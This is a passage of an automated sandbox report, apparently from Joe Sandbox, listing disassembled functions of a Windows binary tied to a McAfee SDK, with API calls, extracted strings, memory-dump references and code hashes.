                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID: '%ls' is not signed by McAfee$C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$PZ$P|$failed to validate '%ls'$mfe_trust_init$mfe_trust_uninit$mfe_trust_validate
                                • API String ID: 3664257935-127399813
                                • Opcode ID: dbbba347882e2a8c21f54a34b5855e59f3378280f5af5a2f61d784ac17191d03
                                • Instruction ID: d9baddef8be8f5602a01b870d466b4370c737f09aa8ec8f34d2152f4650fc673
                                • Opcode Fuzzy Hash: dbbba347882e2a8c21f54a34b5855e59f3378280f5af5a2f61d784ac17191d03
                                • Instruction Fuzzy Hash: FDA10570D043589FEF20CFA4C944BDEBBB4BF05304F10859AD549AB291DBB89A89CF65
                                Function 003F1AB0 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 454registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(Advapi32.dll,A05DD77D), ref: 003F1BBF
                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 003F1BD7
                                • RegCloseKey.ADVAPI32(00000000), ref: 003F1C4F
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,A05DD77D), ref: 003F1CEE
                                • RegCloseKey.ADVAPI32(00000000), ref: 003F1F80
                                • PostMessageW.USER32(00000002,00000000,00000000), ref: 003F20DC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Close$AddressHandleMessageModulePostProcQueryValue
                                • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                • API String ID: 1163662419-2994018265
                                • Opcode ID: e97c5846123a4760c03188e0c9c8632c1a57d19a9c1747ca4672755a38abfd25
                                • Instruction ID: 078f49b441624e59c151059fe790a14b61e0b3350b0dd0285e669e305ce216ae
                                • Opcode Fuzzy Hash: e97c5846123a4760c03188e0c9c8632c1a57d19a9c1747ca4672755a38abfd25
                                • Instruction Fuzzy Hash: 8C02E131A0025CEBEF25CF14EC89BEE77B5AF45304F154298FA09A7290E775AE84CB54
                                Function 003E5710 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000040,00000000,00000000,?), ref: 003E574C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 003E574F
                                • GetProcessHeap.KERNEL32(00000000), ref: 003E5762
                                • CreateSemaphoreExW.KERNEL32(00000000,00000000,00000001,?,00000000,001F0003,?,?), ref: 003E57EF
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E58A0
                                • HeapFree.KERNEL32(00000000), ref: 003E58A3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocateCreateFreeSemaphore
                                • String ID: _p0$T>
                                • API String ID: 3337013264-3997765521
                                • Opcode ID: aa1f5d1f17e7a3a51af377dcdc10baa1f0db2c64c958b6006fe2e5d6e1fdfafe
                                • Instruction ID: d233642662786645f02d24c6c4480f3a55ee832508c9423b2a87a481a0f5c72e
                                • Opcode Fuzzy Hash: aa1f5d1f17e7a3a51af377dcdc10baa1f0db2c64c958b6006fe2e5d6e1fdfafe
                                • Instruction Fuzzy Hash: DD410271B143549BD311EF66EC46B6BB7E8EF88314F00462DF9499B281EB74DD008BA5
                                Function 00438723 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlDecodePointer.NTDLL(?), ref: 0043873C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: DecodePointer
                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                • API String ID: 3527080286-3064271455
                                • Opcode ID: e127dad162e440336174c2904c9739a27f0a25033546d5e0c81014532d5fb527
                                • Instruction ID: fec9153be3740befc1dd75bbf20633465f003f993028f4ae9ade26e023d2a9be
                                • Opcode Fuzzy Hash: e127dad162e440336174c2904c9739a27f0a25033546d5e0c81014532d5fb527
                                • Instruction Fuzzy Hash: D75149B490070ACBDB189F69E84C1AEFBB0FB49304F95505AE491A6254CF7C8A25CB5A
                                Function 004250CB Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 55libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,000000C8,?,?,00425059,00000000,00425185,A05DD77D,000000C8,00000001,0043A630,000000FF,?,00412CB8,?), ref: 004250F7
                                • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 0042510A
                                • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 00425119
                                • GetProcAddress.KERNEL32(00000000,WakeByAddressAll), ref: 00425127
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: WaitOnAddress$WakeByAddressAll$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0.dll
                                • API String ID: 667068680-629889153
                                • Opcode ID: 35454c0dacae52c60a850e10c65aa535fb51b1746814ceb13229ce6e85380443
                                • Instruction ID: d6c6c84c495fb09be6cfee5ecb8580d481b65bce1579375ebe9509c77065e182
                                • Opcode Fuzzy Hash: 35454c0dacae52c60a850e10c65aa535fb51b1746814ceb13229ce6e85380443
                                • Instruction Fuzzy Hash: 8B01FE75B003105BDB105F99BC497AB7B68E796751B60043FFE09D3350E6B8C890875D
                                Function 00424559 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                • String ID:
                                • API String ID: 3943753294-0
                                • Opcode ID: f50776d54b4b3742d0a569b54f6b494039a5aa8c810f08855b0e67d785c9735c
                                • Instruction ID: 57c5d41376eec16a69344c2fec78ff523a3041f8942246899d7687efcab88eb5
                                • Opcode Fuzzy Hash: f50776d54b4b3742d0a569b54f6b494039a5aa8c810f08855b0e67d785c9735c
                                • Instruction Fuzzy Hash: 9B519D35B00225DFCF10DF64E58096ABBF5EF89310BA4406AD9069B245DB78ED81CF69
                                Function 003E9660 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 353COMMON
                                Download Yara Rule
                                APIs
                                • SysStringLen.OLEAUT32(?), ref: 003E9809
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E9B79
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: StringUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: E:\B\T\d30760c8-f36a-4525-bc41-ffb9fa48b740\aviary-sdk\include\aviary\internal\framework_external_client_impl.h$framework$framework$invoke_rpc$invoke_rpc failed for: '%.*ls'
                                • API String ID: 38351148-1254097396
                                • Opcode ID: dfe8afb389d9b73229d317ff74f9058249540e9d5e7fd6181fdff9331bac7e70
                                • Instruction ID: 9bcce2387dfd04d141f652fd41635ca7512f98e6c4df8c5f2145e8a599c0d1d4
                                • Opcode Fuzzy Hash: dfe8afb389d9b73229d317ff74f9058249540e9d5e7fd6181fdff9331bac7e70
                                • Instruction Fuzzy Hash: 65D1E670D002A8DFDF11DFA5C845BDEBBB5BF05304F1082AEE449A7282E774AA84CB55
                                Function 003EB580 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 240memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000004), ref: 003EB6C2
                                • GetCurrentThreadId.KERNEL32 ref: 003EB789
                                • SysFreeString.OLEAUT32(?), ref: 003EB801
                                • SysFreeString.OLEAUT32(?), ref: 003EB80E
                                • SysFreeString.OLEAUT32(?), ref: 003EB81B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$listen_event
                                • API String ID: 3091281111-1468111930
                                • Opcode ID: cd30be2c16aa0b545a7a43d8a79e7bc54f0b653a46e12f1a9a2912f96e2d0383
                                • Instruction ID: 4112e6e94c10918b91a7a121639fc44f5309eb251d32ba0825dafd57d3a010d9
                                • Opcode Fuzzy Hash: cd30be2c16aa0b545a7a43d8a79e7bc54f0b653a46e12f1a9a2912f96e2d0383
                                • Instruction Fuzzy Hash: A8A1D874D002699FDB15CFA9C984B9DFBF5BF48300F1481AAE919AB381DB749A44CF50
                                Function 003EAD80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 240memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000004), ref: 003EAEC2
                                • GetCurrentThreadId.KERNEL32 ref: 003EAF89
                                • SysFreeString.OLEAUT32(?), ref: 003EB001
                                • SysFreeString.OLEAUT32(?), ref: 003EB00E
                                • SysFreeString.OLEAUT32(?), ref: 003EB01B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$subscribe
                                • API String ID: 3091281111-3273043397
                                • Opcode ID: a8630a3b933b0e99c445b5add7f3c1bcf45975c4d6a4ae6c669de89dcee953d3
                                • Instruction ID: 39ac3796e02c755dc924901611888b273382dd45579033370262bcc66404acbf
                                • Opcode Fuzzy Hash: a8630a3b933b0e99c445b5add7f3c1bcf45975c4d6a4ae6c669de89dcee953d3
                                • Instruction Fuzzy Hash: B8A1FA74D002688FDB15CFA9C984B9DBBF5BF48310F1481AAD819AB381E774AE44CF51
                                Function 003EA380 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 230memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,00000002), ref: 003EA410
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                • GetCurrentThreadId.KERNEL32 ref: 003EA4BA
                                • SysFreeString.OLEAUT32(?), ref: 003EA4FF
                                • SysFreeString.OLEAUT32(?), ref: 003EA50C
                                • SysFreeString.OLEAUT32(?), ref: 003EA519
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$Alloc$CurrentInterruptMtx_init_in_situPreciseQueryThreadTimeUnbiased
                                • String ID: dummy$get setting
                                • API String ID: 1410445602-3615255267
                                • Opcode ID: 7e260e6928a2dad9a2f7f2ae77a3d2cc683dd3bb0bb10f12a48a50984f506886
                                • Instruction ID: ee2d99d76c4956de020820181bbf945182a430636d6b7cdaa15dbf3d79c737dd
                                • Opcode Fuzzy Hash: 7e260e6928a2dad9a2f7f2ae77a3d2cc683dd3bb0bb10f12a48a50984f506886
                                • Instruction Fuzzy Hash: 31917371E006689FDB11DFA9C945BAEBBB4FF09300F154269E405AB2D1DB34AE44CB52
                                Function 003EC510 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocStringLen.OLEAUT32(00000000,00000001), ref: 003EC63E
                                • GetCurrentThreadId.KERNEL32 ref: 003EC6F9
                                • SysFreeString.OLEAUT32(?), ref: 003EC76D
                                • SysFreeString.OLEAUT32(?), ref: 003EC77A
                                • SysFreeString.OLEAUT32(?), ref: 003EC787
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$Free$AllocCurrentThread
                                • String ID: dummy$unsubscribe
                                • API String ID: 3091281111-26685671
                                • Opcode ID: 6437ef3e3948af155e47ca7fe32d0b49271c646c6bf827f13c442fe7ebd0473c
                                • Instruction ID: 5d2d2e8278ce84a96d26fe004bbc88c344e665ec99d67e55e77f0e06f98b7014
                                • Opcode Fuzzy Hash: 6437ef3e3948af155e47ca7fe32d0b49271c646c6bf827f13c442fe7ebd0473c
                                • Instruction Fuzzy Hash: EF917171D10268DFDF11CFA9C944B9EBBB5BB05300F14829AE409AB2C1DB749E85CF55
                                Function 003EC0F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 166memorythreadCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00424CBF: RtlAcquireSRWLockExclusive.NTDLL(?), ref: 00424CC5
                                  • Part of subcall function 00424CDB: RtlReleaseSRWLockExclusive.NTDLL(00000000), ref: 00424CE1
                                  • Part of subcall function 003F4E70: __Mtx_init_in_situ.LIBCPMT ref: 003F4ECC
                                • SysAllocStringLen.OLEAUT32(00000000,00000001), ref: 003EC190
                                  • Part of subcall function 003FFE90: QueryUnbiasedInterruptTimePrecise.KERNELBASE ref: 003FFEFD
                                  • Part of subcall function 003E7C00: SysAllocStringLen.OLEAUT32(00000000,00000014), ref: 003E7C16
                                  • Part of subcall function 003E7AA0: SysAllocStringLen.OLEAUT32(00000000,?), ref: 003E7AE9
                                • GetCurrentThreadId.KERNEL32 ref: 003EC227
                                • SysFreeString.OLEAUT32(?), ref: 003EC265
                                • SysFreeString.OLEAUT32(?), ref: 003EC272
                                • SysFreeString.OLEAUT32(?), ref: 003EC27F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: String$AllocFree$ExclusiveLock$AcquireCurrentInterruptMtx_init_in_situPreciseQueryReleaseThreadTimeUnbiased
                                • String ID: dummy$register_for_system_events
                                • API String ID: 2292269400-4124618671
                                • Opcode ID: bb14ab59d989622441ad99d6a401b98fcc74a1e9bb167a369adf7ce91b01f895
                                • Instruction ID: be55c0b78ed87615b4372f3cf54fd7a299f350cd1ceba28edf7562b4731fd341
                                • Opcode Fuzzy Hash: bb14ab59d989622441ad99d6a401b98fcc74a1e9bb167a369adf7ce91b01f895
                                • Instruction Fuzzy Hash: B2617C70E00268DFDF11DFA9D945B9EBBB4FF08300F10416AE905AB381EB75AA05CB55
                                Function 003FC200 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 133libraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(wmiutils.dll,A05DD77D), ref: 003FC248
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,wbem\wmiutils.dll,00000011), ref: 003FC325
                                • FreeLibrary.KERNEL32(00000000), ref: 003FC346
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Library$FreeHandleLoadModule
                                • String ID: unknown$wbem\wmiutils.dll$win32$wmiutils.dll
                                • API String ID: 2140536961-2702560950
                                • Opcode ID: 66701c6c5b007f50b9aeba37b66afd90d49c5a3de748b07bdce4ab7b5a2d7826
                                • Instruction ID: 82674daec2e53c3a88b56e6ac121183c7fb8a26ef30575ba53e9ae2a6221ffeb
                                • Opcode Fuzzy Hash: 66701c6c5b007f50b9aeba37b66afd90d49c5a3de748b07bdce4ab7b5a2d7826
                                • Instruction Fuzzy Hash: 41411975E1020CDBDB02DF64C985BBEBBB5EF44754F24802AE901A7381DB786E04CB95
                                Function 00427840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON
                                Download Yara Rule
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00427877
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0042787F
                                • _ValidateLocalCookies.LIBCMT ref: 00427908
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00427933
                                • _ValidateLocalCookies.LIBCMT ref: 00427988
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
